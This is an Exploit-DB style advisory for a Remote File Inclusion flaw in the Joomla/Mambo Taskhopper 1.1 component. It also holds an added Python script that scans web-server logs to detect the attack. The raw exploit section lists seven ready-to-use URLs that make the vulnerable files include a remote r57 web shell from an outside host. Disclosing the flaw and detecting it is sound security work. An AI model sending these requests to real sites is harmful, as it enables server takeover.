Vendor: Taskhopper
By: Cold z3ro
CVSS: 5.5 (MEDIUM)
CWE: Remote File Inclusion
Product Name: Taskhopper
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Platforms Tested:
2007

Joomla/Mambo Component Taskhopper 1.1 RFI

The Joomla/Mambo component Taskhopper 1.1 is vulnerable to a Remote File Inclusion (RFI) attack. An attacker can include a remote file through the 'mosConfig_absolute_path' parameter of several PHP files under /components/com_thopper/inc/.

Mitigation:

The vulnerability can be mitigated by validating user input and using proper input sanitization techniques to prevent remote file inclusion attacks.
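
For detection alongside that mitigation, the added example below (not part of the advisory or of Taskhopper) scans web-server access logs for requests that supply 'mosConfig_absolute_path' in the query string and separates values pointing off-host from other override attempts. It goes beyond the listed files by flagging the parameter on any path. Assumptions: Combined Log Format input, legitimate requests never carry this parameter because it is a server-side configuration value, and the verdict names and sample lines are constructed for illustration.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "mosconfig_absolute_path"  # parameter named in the advisory, lower-cased
# A value that starts with a URL scheme (two or more characters, so "C:\" is not
# matched) or with "//" points the include at something other than a local path.
NON_LOCAL = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(target: str) -> Optional[str]:
    """Verdict for one request target; None when the parameter is absent."""
    verdict = None
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding, and
        # strip PHP array syntax (name[]=...) before comparing names.
        if unquote(name).split("[", 1)[0].lower() != PARAM:
            continue
        if NON_LOCAL.match(unquote(value)):
            return "remote-include"
        verdict = "config-override"  # parameter supplied, value looks local
    return verdict

def scan(lines):
    """Return (line_number, verdict, path) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict, urlsplit(match.group(1)).path))
    return hits

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2007:09:00:01 +0000] "GET /index.php?option=com_thopper HTTP/1.1" 200 5120',
    '192.0.2.66 - - [10/Apr/2007:09:00:07 +0000] "GET /components/com_thopper/inc/contact_type.php'
    '?mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.0" 200 311',
    '192.0.2.66 - - [10/Apr/2007:09:00:09 +0000] "GET /components/com_thopper/inc/urgency_type.php'
    '?MOSCONFIG_ABSOLUTE_PATH=%68ttp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 311',
    '192.0.2.70 - - [10/Apr/2007:09:01:30 +0000] "GET /components/com_thopper/inc/timelog_type.php'
    '?mosConfig_absolute_path=/tmp HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
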

Exploit-DB raw data:

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/  mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]